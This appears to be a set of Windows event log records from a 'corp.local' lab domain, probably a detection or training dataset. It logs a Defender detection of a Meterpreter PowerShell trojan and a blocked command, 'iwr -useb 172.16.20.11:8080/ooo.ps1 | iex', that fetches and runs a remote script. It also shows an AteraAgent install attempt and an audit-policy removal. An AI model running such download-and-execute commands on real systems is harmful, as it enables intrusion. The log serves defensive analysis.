{"EventTime":"2021-09-07T11:54:52.544999+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":30804,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1283,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The network connection failed.\r\n\r\nError: The transport connection is now disconnected.\r\n\r\nServer name: \\winserver2019\r\nServer address: 192.168.2.108:445\r\nConnection type: Wsk\r\n\r\nGuidance:\r\nThis indicates a problem with the underlying network or transport, such as with TCP/IP, and not with SMB. A firewall that blocks port 445 or 5445 can also cause this issue.","Opcode":"Info","Reason":"7","Status":"3221225996","ServerNameLength":"14","ServerName":"\\winserver2019","AddressLength":"16","Address":"020001BDC0A8026C0000000000000000","ConnectionType":"1","EventReceivedTime":"2021-09-07T11:54:54.310823+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-07T11:54:52.544999+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":30805,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1284,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The client lost its session to the server.\r\n\r\nError: The transport connection is now disconnected.\r\n\r\nServer name: \\winserver2019\r\nSession ID: 0xA40000000035\r\n\r\nGuidance:\r\nIf the server is a Windows Failover Cluster file server, then this message occurs when the file share moves between cluster nodes. There should also be an anti-event 30806 indicating the session to the server was re-established. If the server is not a failover cluster, it is likely that the server was previously online, but it is now inaccessible over the network.","Opcode":"Info","Status":"3221225996","SessionId":"180319906955317","TreeId":"0","ServerNameLength":"14","ServerName":"\\winserver2019","AddressLength":"0","EventReceivedTime":"2021-09-07T11:54:54.310823+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-06T13:23:16.289377+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":8230,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":68338,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The rules engine successfully re-evaluated the schedule.\r\nKernel policies:\r\nSecurity-SPP-Action-StateData (REG_SZ) =AppId=55c92734-d682-4d71-983e-d6ec3f16059f;GraceEndDate=2021/10/06:07:38:15;LastConsumptionReason=0x4004f040;LastNotificationId=VolumeRenewalRequired;LicenseState=SL_LICENSING_STATUS_LICENSED;PartialProductKey=T83GX;ProductKeyType=Volume:GVLK;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;ruleId=502ff3ba-669a-4674-bbb1-601f34a3b968;uxDifferentiator=ENVIRONMENT;volumeActivationOrder=normal","Data":"Security-SPP-Action-StateData (REG_SZ) =AppId=55c92734-d682-4d71-983e-d6ec3f16059f;GraceEndDate=2021/10/06:07:38:15;LastConsumptionReason=0x4004f040;LastNotificationId=VolumeRenewalRequired;LicenseState=SL_LICENSING_STATUS_LICENSED;PartialProductKey=T83GX;ProductKeyType=Volume:GVLK;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;ruleId=502ff3ba-669a-4674-bbb1-601f34a3b968;uxDifferentiator=ENVIRONMENT;volumeActivationOrder=normal","EventReceivedTime":"2021-09-06T13:23:17.021948+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-04T08:44:51.416700+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30808,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1279,"ExecutionProcessID":4,"ExecutionThreadID":5752,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The connection to the share was re-established.\r\n\r\nShare name: \\corp.local\\IPC$\r\nServer address: 192.168.2.47:445\r\nSession ID: 0x1480BF8000025\r\nTree ID: 0x1\r\n\r\nGuidance:\r\nYou should expect this event if there was a previous event 30807, but the client successfully resumed the cached connection before the timeout expired.","Opcode":"Info","Status":"0","SessionId":"360691219300389","TreeId":"1","ServerNameLength":"25","ServerName":"\\corp.local\\IPC$","AddressLength":"16","Address":"020001BDC0A8022F0000000000000000","EventReceivedTime":"2021-09-04T08:44:52.822920+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-04T08:44:51.416700+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":30806,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1278,"ExecutionProcessID":4,"ExecutionThreadID":3104,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The client re-established its session to the server.\r\n\r\nServer name: \\corp.local\r\nServer address: 192.168.2.47:445\r\nSession ID: 0x1480BF8000025\r\n\r\nGuidance:\r\nYou should expect this event if there was a previous event 30805, but the client successfully resumed the cached connection before the timeout expired.","Opcode":"Info","Status":"0","SessionId":"360691219300389","TreeId":"0","ServerNameLength":"20","ServerName":"\\corp.local","AddressLength":"16","Address":"020001BDC0A8022F0000000000000000","EventReceivedTime":"2021-09-04T08:44:52.822920+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-02T13:13:13.952126+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1116,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":21975,"ExecutionProcessID":6828,"ExecutionThreadID":5740,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has detected malware or other potentially unwanted software.\r\n For more information please see the following:\r\nhttps://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0\r\n \tName: Trojan:PowerShell/Meterpreter.gen!A\r\n \tID: 2147727753\r\n \tSeverity: Severe\r\n \tCategory: Trojan\r\n \tPath: amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tDetection Origin: Unknown\r\n \tDetection Type: Concrete\r\n \tDetection Source: AMSI\r\n \tUser: CORP\\Leo\r\n \tProcess Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tSecurity intelligence Version: AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0\r\n \tEngine Version: AM: 1.1.18400.5, NIS: 1.1.18400.5","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2107.4","Detection ID":"{FAA23698-A60C-4DE2-AC6E-8E5D5827CB2F}","Detection Time":"2021-09-02T07:26:08.733Z","Threat ID":"2147727753","Threat Name":"Trojan:PowerShell/Meterpreter.gen!A","Severity ID":"5","Severity Name":"Severe","Category ID":"8","Category Name":"Trojan","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0","Status Code":"1","State":"1","Source ID":"10","Source Name":"AMSI","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Detection User":"CORP\\Leo","Path":"amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Origin ID":"0","Origin Name":"Unknown","Execution ID":"1","Execution Name":"Suspended","Type ID":"0","Type Name":"Concrete","Pre Execution Status":"0","Action ID":"9","Action Name":"Not Applicable","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Post Clean Status":"0","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Security intelligence Version":"AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0","Engine Version":"AM: 1.1.18400.5, NIS: 1.1.18400.5","EventReceivedTime":"2021-09-02T13:13:15.965845+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-02T13:15:46.054286+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1117,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":21976,"ExecutionProcessID":6828,"ExecutionThreadID":5740,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.\r\n For more information please see the following:\r\nhttps://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0\r\n \tName: Trojan:PowerShell/Meterpreter.gen!A\r\n \tID: 2147727753\r\n \tSeverity: Severe\r\n \tCategory: Trojan\r\n \tPath: amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tDetection Origin: Unknown\r\n \tDetection Type: Concrete\r\n \tDetection Source: AMSI\r\n \tUser: NT AUTHORITY\\SYSTEM\r\n \tProcess Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n \tAction: Quarantine\r\n \tAction Status:  No additional actions required\r\n \tError Code: 0x00000000\r\n \tError description: The operation completed successfully. \r\n \tSecurity intelligence Version: AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0\r\n \tEngine Version: AM: 1.1.18400.5, NIS: 1.1.18400.5","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2107.4","Detection ID":"{FAA23698-A60C-4DE2-AC6E-8E5D5827CB2F}","Detection Time":"2021-09-02T07:26:08.733Z","Threat ID":"2147727753","Threat Name":"Trojan:PowerShell/Meterpreter.gen!A","Severity ID":"5","Severity Name":"Severe","Category ID":"8","Category Name":"Trojan","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Meterpreter.gen!A&threatid=2147727753&enterprise=0","Status Code":"3","State":"2","Source ID":"10","Source Name":"AMSI","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Detection User":"CORP\\Leo","Path":"amsi:_C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Origin ID":"0","Origin Name":"Unknown","Execution ID":"1","Execution Name":"Suspended","Type ID":"0","Type Name":"Concrete","Pre Execution Status":"3","Action ID":"2","Action Name":"Quarantine","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Post Clean Status":"0","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Remediation User":"NT AUTHORITY\\SYSTEM","Security intelligence Version":"AV: 1.347.844.0, AS: 1.347.844.0, NIS: 1.347.844.0","Engine Version":"AM: 1.1.18400.5, NIS: 1.1.18400.5","EventReceivedTime":"2021-09-02T13:15:47.635520+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-02T13:11:08.757793+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":200,"SourceName":"PowerShell","Version":0,"TaskValue":2,"OpcodeValue":0,"RecordNumber":2055382,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Command Health: At line:1 char:1\r\n+ $CbLxFVptxxRR = @\"\r\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.. \r\n\r\nDetails: \r\n\tExceptionClass=CmdletInvocationException\r\n\tErrorCategory=ParserError\r\n\tErrorId=ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand\r\n\tErrorMessage=At line:1 char:1\r\n+ $CbLxFVptxxRR = @\"\r\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.\r\n\r\n\tSeverity=Warning\r\n\r\n\tSequenceNumber=50\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.19041.868\r\n\tHostId=ff2e10a3-42e6-4e79-9e1a-e177dbb1d275\r\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n\tEngineVersion=5.1.19041.868\r\n\tRunspaceId=42bdd659-9cf6-41ff-a878-8eeea3dd119f\r\n\tPipelineId=7\r\n\tCommandName=Invoke-Expression\r\n\tCommandType=Cmdlet\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=iwr -useb 172.16.20.11:8080/ooo.ps1 | iex","Category":"Command Health","Opcode":"Info","Data":"At line:1 char:1\n+ $CbLxFVptxxRR = @\"\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.","Data_1":"\tExceptionClass=CmdletInvocationException\n\tErrorCategory=ParserError\n\tErrorId=ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand\n\tErrorMessage=At line:1 char:1\n+ $CbLxFVptxxRR = @\"\n+ ~~~~~~~~~~~~~~~~~~\nThis script contains malicious content and has been blocked by your antivirus software.\n\n\tSeverity=Warning\n\n\tSequenceNumber=50\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.868\n\tHostId=ff2e10a3-42e6-4e79-9e1a-e177dbb1d275\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\tEngineVersion=5.1.19041.868\n\tRunspaceId=42bdd659-9cf6-41ff-a878-8eeea3dd119f\n\tPipelineId=7\n\tCommandName=Invoke-Expression\n\tCommandType=Cmdlet\n\tScriptName=\n\tCommandPath=\n\tCommandLine=iwr -useb 172.16.20.11:8080/ooo.ps1 | iex","EventReceivedTime":"2021-09-02T13:11:09.565762+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T10:43:05.098665+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4109,"SourceName":"Microsoft-Windows-CAPI2","ProviderGuid":"{5BBCA4A8-B209-48DC-A8C7-B23D3E5216FB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":27477,"ExecutionProcessID":2488,"ExecutionThreadID":3688,"Channel":"Application","Message":"Successful auto property update of third-party root certificate:: Subject: <CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US> Sha1 thumbprint: <DF3C24F9BFD666761B268073FE06D1CC8D4F82A4>.","Opcode":"Info","EventData":"<Data>CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US</Data><Data>DF3C24F9BFD666761B268073FE06D1CC8D4F82A4</Data>","EventReceivedTime":"2021-09-01T10:43:06.379915+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T14:55:52.680911+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11708,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67802,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: AteraAgent -- Installation failed.","Opcode":"Info","Data":"Product: AteraAgent -- Installation failed.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B39313835344637322D323741312D343044412D413732352D4433353137453132374330447D","EventReceivedTime":"2021-09-01T14:55:53.556058+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T14:55:52.525175+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":11925,"SourceName":"MsiInstaller","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67801,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Product: AteraAgent -- Error 1925. You do not have sufficient privileges to complete this installation for all users of the machine.  Log on as administrator and then retry this installation.","Opcode":"Info","Data":"Product: AteraAgent -- Error 1925. You do not have sufficient privileges to complete this installation for all users of the machine.  Log on as administrator and then retry this installation.","Data_1":"(NULL)","Data_2":"(NULL)","Data_3":"(NULL)","Data_4":"(NULL)","Data_5":"(NULL)","EventData.Binary":"7B39313835344637322D323741312D343044412D413732352D4433353137453132374330447D","EventReceivedTime":"2021-09-01T14:55:52.555885+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T15:57:02.742787+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10003,"SourceName":"Microsoft-Windows-RestartManager","ProviderGuid":"{0888E5EF-9B98-4695-979D-E92CE4247224}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67840,"ExecutionProcessID":4756,"ExecutionThreadID":7344,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Restarting application or service 'AteraAgent'.","Opcode":"Info","RmApplicationEvent.RmSessionId":"0","RmApplicationEvent.FullPath":"AteraAgent.exe","RmApplicationEvent.DisplayName":"AteraAgent","RmApplicationEvent.AppVersion":"0","RmApplicationEvent.AppType":"3","RmApplicationEvent.TSSessionId":"0","RmApplicationEvent.Status":"262155","RmApplicationEvent.Pid":"9828","RmApplicationEvent.nFiles":"0","EventReceivedTime":"2021-09-01T15:57:04.285588+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-01T16:00:38.158698+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1026,"SourceName":".NET Runtime","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":67848,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Application: AgentPackageTicketing.exe\nFramework Version: v4.0.30319\nDescription: The process was terminated due to an unhandled exception.\nException Info: System.IO.FileNotFoundException\n   at AgentPackageTicketing.DownloadAndUnzipNuget.ExtractZipFile(System.IO.MemoryStream, System.String)\n   at AgentPackageTicketing.DownloadAndUnzipNuget.Run()\n   at AgentPackageTicketing.Program.Main(System.String[])\n\n","Opcode":"Info","Data":"Application: AgentPackageTicketing.exe\nFramework Version: v4.0.30319\nDescription: The process was terminated due to an unhandled exception.\nException Info: System.IO.FileNotFoundException\n   at AgentPackageTicketing.DownloadAndUnzipNuget.ExtractZipFile(System.IO.MemoryStream, System.String)\n   at AgentPackageTicketing.DownloadAndUnzipNuget.Run()\n   at AgentPackageTicketing.Program.Main(System.String[])\n\n","EventReceivedTime":"2021-09-01T16:00:39.096203+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:03:47.002016+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5156,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":4025408,"ExecutionProcessID":4,"ExecutionThreadID":2580,"Channel":"Security","Message":"The Windows Filtering Platform has permitted a connection.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t2316\r\n\tApplication Name:\t\\device\\harddiskvolume2\\program files\\nxlog\\nxlog.exe\r\n\r\nNetwork Information:\r\n\tDirection:\t\tOutbound\r\n\tSource Address:\t\t192.168.2.46\r\n\tSource Port:\t\t49694\r\n\tDestination Address:\t192.168.4.132\r\n\tDestination Port:\t\t514\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t82874\r\n\tLayer Name:\t\tConnect\r\n\tLayer Run-Time ID:\t48","Category":"Filtering Platform Connection","Opcode":"Info","ProcessID":"2316","Application":"\\device\\harddiskvolume2\\program files\\nxlog\\nxlog.exe","Direction":"%%14593","SourceAddress":"192.168.2.46","SourcePort":"49694","DestAddress":"192.168.4.132","DestPort":"514","Protocol":"6","FilterRTID":"82874","LayerName":"%%14611","LayerRTID":"48","RemoteUserID":"S-1-0-0","RemoteMachineID":"S-1-0-0","EventReceivedTime":"2021-08-27T13:03:56.670598+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:03:47.099771+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5158,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":4025478,"ExecutionProcessID":4,"ExecutionThreadID":2580,"Channel":"Security","Message":"The Windows Filtering Platform has permitted a bind to a local port.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t376\r\n\tApplication Name:\t\\device\\harddiskvolume2\\windows\\system32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tSource Address:\t\t0.0.0.0\r\n\tSource Port:\t\t49887\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t0\r\n\tLayer Name:\t\tResource Assignment\r\n\tLayer Run-Time ID:\t36","Category":"Filtering Platform Connection","Opcode":"Info","ProcessId":"376","Application":"\\device\\harddiskvolume2\\windows\\system32\\svchost.exe","SourceAddress":"0.0.0.0","SourcePort":"49887","Protocol":"6","FilterRTID":"0","LayerName":"%%14608","LayerRTID":"36","EventReceivedTime":"2021-08-27T13:03:56.811213+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T11:50:56.358840+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5154,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12810,"OpcodeValue":0,"RecordNumber":1080407,"ExecutionProcessID":4,"ExecutionThreadID":2580,"Channel":"Security","Message":"The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.\r\n\r\nApplication Information:\r\n\tProcess ID:\t\t3736\r\n\tApplication Name:\t\\device\\harddiskvolume2\\windows\\system32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tSource Address:\t\t::\r\n\tSource Port:\t\t7680\r\n\tProtocol:\t\t6\r\n\r\nFilter Information:\r\n\tFilter Run-Time ID:\t82911\r\n\tLayer Name:\t\tListen\r\n\tLayer Run-Time ID:\t42","Category":"Filtering Platform Connection","Opcode":"Info","ProcessId":"3736","Application":"\\device\\harddiskvolume2\\windows\\system32\\svchost.exe","SourceAddress":"::","SourcePort":"7680","Protocol":"6","FilterRTID":"82911","LayerName":"%%14609","LayerRTID":"42","EventReceivedTime":"2021-08-27T11:51:02.183961+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:03:47.689751+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4719,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13568,"OpcodeValue":0,"RecordNumber":4025734,"ActivityID":"{EB507E61-9B07-0001-E57E-50EB079BD701}","ExecutionProcessID":664,"ExecutionThreadID":5660,"Channel":"Security","Message":"System audit policy was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nAudit Policy Change:\r\n\tCategory:\t\tObject Access\r\n\tSubcategory:\t\tFiltering Platform Connection\r\n\tSubcategory GUID:\t{0cce9226-69ae-11d9-bed3-505054503030}\r\n\tChanges:\t\tSuccess removed, Failure removed","Category":"Audit Policy Change","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","CategoryId":"%%8274","SubcategoryId":"%%12810","SubcategoryGuid":"{0cce9226-69ae-11d9-bed3-505054503030}","AuditPolicyChanges":"%%8448, %%8450","EventReceivedTime":"2021-08-27T13:03:57.170570+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T13:57:19.612056+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5,"SourceName":"Microsoft-Windows-Bits-Client","ProviderGuid":"{EF1CC15B-46C1-414E-BB95-E76B077BD51E}","Version":1,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4487,"ExecutionProcessID":376,"ExecutionThreadID":268,"Channel":"Microsoft-Windows-Bits-Client/Operational","Domain":"CORP","AccountName":"Leo","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1139","AccountType":"User","Message":"Job cancelled. User: CORP\\Leo, job: FontUpdates, jobID: {463719c1-b25d-4b8f-b4a1-525dad474fe4}, owner: CORP\\Leo, filecount: 1","Opcode":"Info","User":"CORP\\Leo","jobTitle":"FontUpdates","jobId":"{463719c1-b25d-4b8f-b4a1-525dad474fe4}","jobOwner":"CORP\\Leo","fileCount":"1","EventReceivedTime":"2021-08-27T13:57:20.754237+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T14:39:14.153219+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":142,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23447,"ActivityID":"{F420ABE0-482B-4478-B140-1FFFC2130000}","ExecutionProcessID":444,"ExecutionThreadID":3120,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"TCP socket READ operation failed, error 121","Category":"RemoteFX module","Opcode":"EstablishConnection","error":"121","EventReceivedTime":"2021-08-27T14:39:15.558337+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-08-27T14:39:14.153126+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":226,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23446,"ActivityID":"{F420ABE0-482B-4478-B140-1FFFC2130000}","ExecutionProcessID":444,"ExecutionThreadID":3256,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"RDP_TCP: An error was encountered when transitioning from StateUnknown in response to Event_Disconnect (error code 0x80070079).","Category":"RemoteFX module","Opcode":"Runtime","StateTransition":"RDP_TCP","PreviousState":"23","PreviousStateName":"StateUnknown","NewState":"21","NewStateName":"StateDisconnected","Event":"43","EventName":"Event_Disconnect","ErrorCode":"0x80070079","EventReceivedTime":"2021-08-27T14:39:15.542661+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
